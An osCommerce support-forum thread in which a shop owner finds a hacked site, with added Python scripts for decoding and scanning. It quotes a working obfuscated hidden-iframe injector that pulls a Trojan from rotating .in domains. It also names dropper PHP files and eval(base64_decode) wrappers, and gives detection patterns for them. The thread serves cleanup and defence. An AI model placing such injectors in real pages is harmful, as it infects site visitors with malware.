
osCommerce


Some strange Trojan virus.


Tsport


I don't see any malicious files, or scripts or iframes in the source.

 

Check the contents of the .htaccess in the root folder for redirects to other sites.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


Alex,

 

I agree with Jim. I did not really find any signs of hacker files and received no security messages while looking around your website.

 

 

 

 

Chris



I still have the same problem!!! Sometimes I get some strange Trojan security report!

When I just open the index page, in the source I found this:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->

 

And the Trojan comes from http://8931.in/dududu.js

 

I have tried to find this source code in all the pages (header.php, index.php, etc.) and I found nothing!

And by the way, the four numbers always change; sometimes it can be like 5436.in/ and so on...

And when I get no Trojan reports, the source is without this code.

 

 

</script>

<form name="quick_find" action="http://billing.iqxtech.com/advanced_search_result.php" method="get"><input type="text" name="keywords" value="חיפוש מהיר..." id="txtSearch" size="15" onFocus="Clear(this)" autocomplete="off" maxlength="50" class=searchHeader> <input type="hidden" name="osCsid" value="f257a22ba87b3527fbac707b28c7140f">

<input type=image src=layout/images/search_btn.gif align="absmiddle" >

 

</form></div></div><br class="clearfloat" />

<div id="mainContent">

 

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->

 

<!-- body //-->

 

Up to <div style="display: block;

the source is in header.php.

Here's the site: http://iqxtech.com

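The posted markup can be decoded without loading the page in a browser. This is an added example, not code from the thread: INJECTED is the snippet exactly as posted above, and the Python around it is my own static reconstruction of what the onError handler's eval() computes.

```python
"""
Added example, not code from the thread: reconstruct what the hidden-iframe
injector's onError handler computes, without running any JavaScript.
INJECTED is the markup exactly as posted above; everything else is mine.
"""
import re
from urllib.parse import unquote

INJECTED = r"""<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->"""


def decode_injector(html):
    """Return the iframe the handler retargets, the URL it builds, and which
    element ids it pulls into that URL."""
    m = re.search(r"onError='([^']*)'", html, re.IGNORECASE)
    if not m:
        raise ValueError("no single-quoted onError handler found")
    handler = m.group(1)

    # Statement 1 stashes a quote character so the attribute itself needs none:
    #     njjavmj=unescape("%27")   ->   "'"
    var, enc_quote = re.search(r'(\w+)=unescape\("([^"]*)"\)', handler).groups()
    quote = unquote(enc_quote)

    # Statement 2 builds JavaScript source by string concatenation and eval()s it.
    # Splicing the quote back in gives the plain source text.
    eval_arg = re.search(r'eval\("(.*)"\);', handler).group(1)
    js = eval_arg.replace('"+' + var + '+"', quote)

    target, rhs = re.match(r"document\.getElementById\('([^']*)'\)\.src=(.*)", js).groups()

    # Evaluate the right-hand side term by term in Python instead of eval():
    #   unescape('%68...')            -> percent-decoded literal
    #   getElementById('8931').id     -> the id attribute itself (the 1x1 <img>)
    #   '1299430150'                  -> plain string literal
    ids_in_page = set(re.findall(r'\bid="([^"]*)"', html))
    term = re.compile(
        r"unescape\('([^']*)'\)"
        r"|document\.getElementById\('([^']*)'\)\.id"
        r"|'([^']*)'"
    )
    parts, carriers = [], []
    for enc, elem_id, lit in term.findall(rhs):
        if enc:
            parts.append(unquote(enc))
        elif elem_id:
            if elem_id not in ids_in_page:
                raise ValueError("handler references missing element id " + elem_id)
            parts.append(elem_id)
            carriers.append(elem_id)
        else:
            parts.append(lit)
    return {"iframe_id": target, "url": "".join(parts), "id_carriers": carriers}


if __name__ == "__main__":
    print(decode_injector(INJECTED))
```

Running it shows the hidden iframe `rsaqr` being pointed at http://8931.in/1299430150.php. The hostname is literally the `id` attribute of the 1x1 `<img>`, so the four digits can differ on every page load while the handler text stays identical, which is why searching the files for a domain name finds nothing: the server-side code that prints this block chooses the number, and the block only appears in responses where that code ran.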

Hack files currently in your images folder:

 

google033ca56fcb20d1b7.php

googlec6e11a4aebef71ed.php

googleeeae99914d1a2ad8.php

 

Hackers hide their code.

 

Look for code in your files that has these php keywords:

 

base64_decode or eval or gzinflate


I don't see anything like the code you posted in the page source when I access the site.

 

If you found it in the header then use a text editor and look in /includes/header.php


I have deleted the

google033ca56fcb20d1b7.php

googlec6e11a4aebef71ed.php

googleeeae99914d1a2ad8.php

 

in the images folder and the hack has gone :P Now I need to protect my folders.

How should I look for them in my PHP files? With what program?

Thank you!

 

 

If you use most web editing tools (like Dreamweaver) you will have a search or find function, and usually options on how it does that.

 

So you search or find for "base64_decode" (for example) and select the entire site. Then you will get a list of files with that code in them.

In the case of this example it is usually at the top of every PHP file in the site, and it is usually easier to upload a clean copy of your files than to fix every file.

Search the forums or Google for how to fix your system to prevent specific things you find.

 

If you have a way to get a file count on your host (maybe 400 to several thousand files) you can check that, and when no users are on it should only change when you add something. If it changes without you adding something, then someone else added some file somewhere.

Sometimes you can find those by sorting by date/time on the host and seeing what the "new" file(s) are.

 

Of course, do all the regular security measures detailed elsewhere on the forums, like file/dir permissions, htaccess, etc.

 

Good luck.

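The checks recommended above (grep for base64_decode/eval/gzinflate, look for PHP dropped into the images folder, check .htaccess for redirects to other sites, watch the file count and modification times) can be done with one script instead of an editor's find dialog. This is an added example, not code from the thread or from osCommerce; the directory layout and file contents it scans are constructed for the demo, and the list of "media" directories that should never hold PHP is my assumption.

```python
"""
Added example (not from the thread or the osCommerce project): a read-only
scanner that does by script what the posts above describe doing by hand.
The sample site it builds is constructed here, not taken from any real host.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# The keywords the thread names, plus the usual substitutes, wrapped by eval/assert.
OBFUSCATED_EVAL = re.compile(
    rb"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
    re.IGNORECASE,
)
# Redirect / RewriteRule lines in .htaccess that send visitors to another host.
HTACCESS_REDIRECT = re.compile(
    rb"^\s*(?:Redirect(?:Match|Permanent)?|RewriteRule)\b.*https?://",
    re.IGNORECASE | re.MULTILINE,
)
PHP_SUFFIXES = {".php", ".phtml", ".php5"}
MEDIA_DIRS = {"images", "image", "img"}      # assumption: these should never contain PHP


def scan_tree(root, baseline=None):
    """Walk `root` and return the findings the thread's advice is looking for.
    `baseline` is a known-good timestamp; files newer than it are reported."""
    root = Path(root)
    out = {"count": 0, "obfuscated": [], "php_in_media": [], "htaccess_redirects": [], "changed": []}
    files = sorted((p for p in root.rglob("*") if p.is_file()),
                   key=lambda p: p.relative_to(root).as_posix())
    for path in files:
        rel = path.relative_to(root).as_posix()
        out["count"] += 1
        if baseline is not None and path.stat().st_mtime > baseline:
            out["changed"].append(rel)
        if path.name == ".htaccess" and HTACCESS_REDIRECT.search(path.read_bytes()):
            out["htaccess_redirects"].append(rel)
        if path.suffix.lower() in PHP_SUFFIXES:
            if MEDIA_DIRS.intersection(path.relative_to(root).parts[:-1]):
                out["php_in_media"].append(rel)
            if OBFUSCATED_EVAL.search(path.read_bytes()):
                out["obfuscated"].append(rel)
    return out


def build_sample_site(root, baseline):
    """Constructed sample: a clean store older than `baseline`, then the kinds of
    changes reported in this thread, all written after it."""
    clean = {
        "index.php": "<?php require('includes/application_top.php'); ?>\n",
        "includes/header.php": "<?php /* clean header */ ?>\n",
        "images/logo.gif": "GIF89a",
        ".htaccess": "RewriteEngine On\n",
    }
    dropped = {
        # PHP hidden in images/ under the Google-verification-looking name from the thread
        "images/google033ca56fcb20d1b7.php": "<?php eval(base64_decode('aGVsbG8=')); ?>\n",
        # a one-line wrapper prepended to a legitimate include (header.php in the thread)
        "includes/header.php": "<?php eval(gzinflate(base64_decode('aGVsbG8='))); ?>\n"
                               "<?php /* clean header */ ?>\n",
        # every request redirected to a third-party host (example.invalid is a placeholder)
        ".htaccess": "RewriteEngine On\nRewriteRule ^(.*)$ http://example.invalid/$1 [R,L]\n",
    }
    for files, stamp in ((clean, baseline - 86400), (dropped, baseline + 60)):
        for rel, body in files.items():
            p = Path(root, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
            os.utime(p, (stamp, stamp))


def demo():
    """Build the sample site in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        baseline = time.time() - 3600     # pretend the last known-good check was an hour ago
        build_sample_site(tmp, baseline)
        return scan_tree(tmp, baseline)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real site run `scan_tree` against a copy downloaded from the host, as the Wingrep suggestion below also implies, and keep the baseline timestamp (or better, a list of file hashes) from a moment you trust; the file count alone only tells you that something changed, the `changed` list tells you where to look first.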

I wouldn't suggest using Dreamweaver at all! Use Wingrep to search all files once downloaded onto your local machine.

 

 

 

Chris


You also need to patch your website so that an attacker cannot return and repeat the same action again.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX


What patch? Can you link to the patch, please?

I have found this code:

<?php eval(base64_decode("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"));?>

in Header.php

Can you decode it? :P Interesting what's typed in there.


The eval code you posted when decoded contains a function that when called allows eval code strings to be called in reverse (basically reading code backwards).

 

It looks to me like it's a logging script that logs the site visitor's IP and downloads some code (probably a file with a virus in it) from a URL on a server at http:// ininininin.in/, as well as placing a cookie in your browser, while bypassing any search engines that may view that page.

 

As for the patch link, there are quite a few posts in this forum with extensive lists of instructions of how to patch your site to clean up affected pages and patch the security holes so that attackers cannot further compromise your security. Most of them are in reference to this type of problem.

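Nested wrappers like the eval(base64_decode("...")) line found in header.php, and the "code read backwards" layer described in the reply, can be peeled statically rather than by running the PHP. This is an added example, not code from the thread: the real payload is not reproduced on this page, so the sample here is built from a harmless stand-in with a placeholder hostname (example.invalid), and the decoder table covers the PHP functions attackers commonly chain.

```python
"""
Added example (not from the thread): peel nested eval(...) wrappers without
executing them. The sample payload is constructed from a harmless stand-in;
its hostname and logic are placeholders, not the thread's real payload.
"""
import base64
import codecs
import re
import zlib
from urllib.parse import unquote

# eval( f1( f2( '...' ) ) );   group 1: wrapper calls, group 2: quote, group 3: payload
EVAL_CHAIN = re.compile(
    r"""eval\s*\(\s*((?:\w+\s*\(\s*)*)(['"])((?:(?!\2).)*)\2\s*\)+\s*;?""",
    re.IGNORECASE | re.DOTALL,
)

# Pure-Python equivalents of the PHP decoders attackers chain together.
# Strings are carried as latin-1 so binary deflate output round-trips losslessly.
DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
    "gzuncompress": lambda s: zlib.decompress(s.encode("latin-1")).decode("latin-1"),
    "strrev": lambda s: s[::-1],
    "str_rot13": lambda s: codecs.decode(s, "rot13"),
    "urldecode": unquote,
}

# Behaviours the reply above describes (IP logging, remote fetch, cookie, bot cloaking).
INDICATORS = {
    "user_agent_cloaking": r"HTTP_USER_AGENT",
    "logs_visitor_ip": r"REMOTE_ADDR",
    "fetches_remote_code": r"\b(?:file_get_contents|curl_exec|fsockopen|fopen)\s*\(\s*[\"']https?://",
    "sets_cookie": r"\bsetcookie\s*\(",
}


def unwrap(php_src, max_layers=16):
    """Replace each eval(...) wrapper with its decoded contents, innermost call first.
    Returns (decoded source, list of decoder names applied in order)."""
    trail = []
    for _ in range(max_layers):
        m = EVAL_CHAIN.search(php_src)
        if not m:
            break
        funcs = [f.lower() for f in re.findall(r"\w+", m.group(1))]
        payload = m.group(3)
        for fn in reversed(funcs):          # PHP evaluates the innermost call first
            if fn not in DECODERS:
                raise ValueError("unknown wrapper %s(); decode it by hand" % fn)
            payload = DECODERS[fn](payload)
            trail.append(fn)
        php_src = php_src[:m.start()] + payload + php_src[m.end():]
    return php_src, trail


def indicators(code):
    """Name the behaviours a reviewer would want to know about in the decoded payload."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, code, re.IGNORECASE)]


def wrap_like_attacker(code):
    """Constructed sample: reverse the code, then raw-deflate and base64 the
    eval(strrev()) wrapper, the shape this thread's reply describes."""
    if "'" in code:
        raise ValueError("stand-in code must not contain single quotes")
    inner = "eval(strrev('" + code[::-1] + "'));"
    c = zlib.compressobj(9, zlib.DEFLATED, -15)     # raw deflate is what PHP gzinflate() expects
    deflated = c.compress(inner.encode("latin-1")) + c.flush()
    return "<?php eval(gzinflate(base64_decode('" + base64.b64encode(deflated).decode("ascii") + "'))); ?>"


# Harmless stand-in for the real payload; example.invalid is a placeholder host.
INNER = ('$bot = preg_match("/google|bing|yahoo/i", $_SERVER["HTTP_USER_AGENT"]); '
         'if (!$bot) { @file_get_contents("http://example.invalid/log.php?ip=" . $_SERVER["REMOTE_ADDR"]); '
         'setcookie("seen", "1"); }')
SAMPLE = wrap_like_attacker(INNER)


if __name__ == "__main__":
    decoded, trail = unwrap(SAMPLE)
    print(trail)
    print(decoded)
    print(indicators(decoded))
```

The decoder stops and raises on any wrapper it does not know (for example a custom function defined earlier in the same file, which is what "a function that allows eval code strings to be called in reverse" amounts to); at that point add the function's Python equivalent to DECODERS rather than running the original, since executing it would do exactly what the attacker wanted.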


I've also got the "Trojan Virus" that keeps being blocked by Avast. So far, an item has been removed, only for it to return. Not sure what to do.

 

States: Trojan Horse

JS:IFrame-AU [Trj]

 

 

Please help. Any help would be SO appreciated. Thank you so much in advance.

 

Jeanne


Archived

This topic is now archived and is closed to further replies.
